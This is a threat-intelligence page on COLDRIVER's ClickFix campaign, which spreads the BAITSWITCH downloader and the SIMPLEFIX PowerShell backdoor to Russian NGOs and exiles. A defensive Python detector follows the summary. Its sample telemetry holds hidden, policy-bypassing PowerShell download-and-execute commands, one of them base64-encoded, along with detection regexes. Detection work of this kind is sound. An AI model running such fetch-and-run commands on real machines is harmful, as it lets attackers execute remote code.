Updates Arsenal with BAITSWITCH and SIMPLEFIX

NetmanageIT OpenCTI - opencti.netmanageit.com


SUMMARY :

A new multi-stage ClickFix campaign, attributed to the Russia-linked APT group COLDRIVER, has been discovered targeting Russian civil society members. The campaign employs social engineering techniques to trick users into executing malicious commands, leading to the deployment of two new malware families: BAITSWITCH (a downloader) and SIMPLEFIX (a PowerShell-based backdoor). The attack chain involves a fake Cloudflare Turnstile checkbox, persistence establishment, and data exfiltration. COLDRIVER's tactics include using server-side checks, obfuscation techniques, and targeting specific file types for intelligence collection. The group's focus on NGOs, human rights defenders, and Russian exiles aligns with their known victimology.

OPENCTI LABELS :

apt,backdoor,powershell,social engineering,russia,clickfix,baitswitch,simplefix


AI COMMENTARY :

1. The intelligence report titled Updates Arsenal with BAITSWITCH and SIMPLEFIX describes a multi-stage ClickFix campaign attributed to the Russia-linked APT group COLDRIVER. The campaign targets members of Russian civil society, including NGOs, human rights defenders, and exiles. By presenting a fake Cloudflare Turnstile checkbox, the attackers lure victims into executing hidden malicious commands under the guise of a routine verification step. This social engineering lure is the entry point to an attack chain that ultimately exfiltrates the victim's sensitive data.

2. At the heart of the operation lies BAITSWITCH, a downloader that fetches additional payloads after the initial execution. BAITSWITCH relies on server-side checks to verify victim attributes before content is delivered, so the next stage only reaches intended targets. Its code is heavily obfuscated, which thwarts automated analysis and complicates detection. Once BAITSWITCH has a foothold on the system, it establishes persistence so that subsequent stages of the ClickFix chain survive reboots and simple cleanup attempts.

3. The second stage is SIMPLEFIX, a PowerShell-based backdoor that gives the operators remote access. By running inside the legitimate PowerShell host, SIMPLEFIX leaves minimal artifacts on disk and blends into normal system activity. The backdoor lets COLDRIVER operators execute arbitrary commands, harvest specified file types such as documents and spreadsheets, and exfiltrate intelligence on NGO activities and dissident communications. The choice of PowerShell underscores the group's preference for living-off-the-land techniques that evade signature-based antivirus.

4. COLDRIVER's tradecraft in this campaign shows several hallmarks of Russia-linked APTs. Social engineering remains central, with lures tailored to the targets' roles and interests within civil society. Obfuscation at both the downloader and backdoor stages defeats static signature detection. Server-side gating ensures that the malicious payload is served only to intended victims, limiting exposure to sandboxes, scanners, and researchers. Together these measures reflect an adversary committed to stealth and targeted intelligence collection.

5. The victimology of this ClickFix operation matches COLDRIVER's historical focus on politically sensitive groups and individuals. By prioritizing NGOs, human rights defenders, and Russian exile communities, the attackers seek insight into internal discussions, strategic planning, and external support networks. Exfiltrated documents and correspondence not only enrich the group's intelligence holdings but also enable follow-on operations, including blackmail or public exposure of dissident activities.

6. Defending against this campaign requires a layered approach combining user training, endpoint monitoring, and network safeguards. Personnel should be taught that no legitimate verification prompt, CAPTCHA or otherwise, asks the user to copy and run a command on their own machine, and that any such request is a red flag. Endpoint detection should be configured to flag PowerShell launched by a user-driven parent process (for example explorer.exe via the Run dialog) with hidden-window, encoded, or download-and-execute arguments, together with the downloader behavior associated with BAITSWITCH. Network defenses can block known command-and-control domains, disrupting the campaign's communication channels. Combined, these measures reduce the risk posed by this evolving APT threat.
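The endpoint-monitoring point above can be turned into a concrete log-review step. The Python script below is an added example written for this page; it is not code from the report, from Zscaler, or from OpenCTI. It walks process-creation records (Sysmon Event ID 1 / Windows 4688 style fields), decodes any -EncodedCommand argument, and reports a launch when several independent ClickFix indicators coincide. The sample records are constructed, and the indicators (interactive parent such as explorer.exe, hidden window, profile and policy bypass, encoded or download-and-execute invocation) are an assumption based on generic ClickFix tradecraft, not IoCs from this campaign, which the summary above does not list.

```python
"""Heuristic review of process-creation telemetry for ClickFix-style PowerShell launches.

Added example for this page; it is not code from the report, from Zscaler or
from OpenCTI.  The records below are constructed (Sysmon Event ID 1 / Windows
4688 style fields), and the indicators encode generic ClickFix tradecraft as an
assumption: a script host started by an interactive parent such as explorer.exe
(the Run dialog), a hidden window, an encoded or policy-bypassing invocation,
and download-and-execute logic.  They are not IoCs taken from this campaign.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Script hosts a ClickFix lure typically asks the victim to start.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Parents that imply a human typed or pasted the command (Run dialog, terminal).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
# Command-line indicators; each one counts once, however often it matches.
INDICATORS = [
    ("hidden_window", r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b"),
    ("no_profile", r"(?i)-no(?:p|profile)\b"),
    ("bypass_policy", r"(?i)-e(?:p|xecutionpolicy)\s+bypass\b"),
    ("encoded_command", r"(?i)-e(?:c|nc|ncodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    ("invoke_expression", r"(?i)\b(?:iex|invoke-expression)\b"),
    ("remote_fetch", r"(?i)\b(?:downloadstring|downloadfile|invoke-webrequest|iwr|curl|wget)\b|https?://"),
]
THRESHOLD = 3  # independent indicators required before an event is reported


def _encode_ps(script: str) -> str:
    """Build PowerShell's -EncodedCommand argument: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry (192.0.2.0/24 is a documentation range), not real events.
SAMPLE_EVENTS: List[Dict] = [
    {"pid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient)"
                ".DownloadString('http://192.0.2.10/verify.ps1')\""},
    {"pid": 4130, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand "
                + _encode_ps("iex (iwr http://192.0.2.10/a).Content")},
    {"pid": 4140, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Vendor\agent.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\ProgramData\Vendor\inventory.ps1"},
    {"pid": 4150, "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe /c dir"},
]


@dataclass
class Finding:
    pid: int
    indicators: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.indicators)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script hidden behind -enc/-EncodedCommand, or None if absent or invalid."""
    m = re.search(r"(?i)-e(?:c|nc|ncodedcommand)\s+([A-Za-z0-9+/=]{20,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(event: Dict) -> Optional[Finding]:
    """Return a Finding when the event looks like a user-driven ClickFix launch, else None."""
    if _basename(event["image"]) not in SCRIPT_HOSTS:
        return None
    hits: List[str] = []
    parent = _basename(event["parent"])
    if parent in INTERACTIVE_PARENTS:
        hits.append("interactive_parent:" + parent)
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.append("decoded_payload")
        text = text + "\n" + decoded  # scan the wrapper and the decoded script together
    hits.extend(name for name, pattern in INDICATORS if re.search(pattern, text))
    return Finding(event["pid"], hits) if len(hits) >= THRESHOLD else None


def scan(events: List[Dict]) -> List[Finding]:
    """Apply assess() to every record and keep those that cross the threshold."""
    return [f for f in (assess(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"pid {finding.pid}: score {finding.score} -> {', '.join(finding.indicators)}")
```

On the constructed records, the two explorer.exe-spawned PowerShell launches (one plain, one base64-encoded) are reported with six indicators each, while the vendor agent's scheduled inventory script and a plain cmd.exe from the Run dialog stay below the threshold. Requiring several co-occurring indicators rather than any single one is what keeps an administrator's own -NoProfile invocation from paging the on-call analyst; tune THRESHOLD and the parent list to the environment's baseline before deploying the logic in a SIEM rule.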
